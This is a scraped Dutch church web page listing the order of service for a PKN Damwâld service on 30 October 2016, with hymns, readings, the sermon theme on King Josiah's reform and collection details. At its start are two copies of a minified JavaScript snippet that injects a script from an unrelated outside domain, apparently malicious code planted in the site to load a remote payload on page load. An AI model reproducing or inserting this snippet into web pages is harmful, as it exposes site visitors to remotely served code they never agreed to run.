;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 30 oktober 2016 9:30 uur - PKN Damwâld
zondag 30 oktober 2016
09:30 uur

Kerkdienst zondag 30 oktober 2016 9:30 uur

Thema: De reformatie van Josia

vg_-01

Informatie

Voorganger:Ds. G. Timmer
Organist:Foeke Wiegersma
Thema:De reformatie van Josia
Liturgie
We zingen: Gezang 303 : 1, 2 & 5
Welkom en mededelingen
We zingen: Psalm 89 : 1 & 2
Stil gebed, bemoediging en groet
We zingen: Elb 374 : 1, 2 & 3
Voorbereiding op de viering van het Avondmaal: Lezing van het formulier
We zingen: Psalm 130 : 2 & 4
Gebed opening van het Woord
We lezen: 2 Koningen 22 : 1-20
We zingen: Gezang 305 : 1 & 2
Verkondiging: “De Reformatie van Josia”
We zingen: Psalm 43 : 3, 4 & 5
Dankgebed en voorbeden
Collecte
We zingen: Elb 244B : 1 & 2
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Rudolphstichting

De Rudolphstichting onderhoudt gezinshuizen en zorgwoningen in Jeugddorp De Glind. Daarnaast ontwikkelt zij projecten die de zorg voor uit huis geplaatste kinderen en jongeren verbeteren en vernieuwen. Herstel van het normale leven is hierbij uitgangspunt. Zodat deze jongeren alle kans krijgen om zich te richten op de toekomst.

Tweede collecte: Kerk
Uitganscollecte: Kerk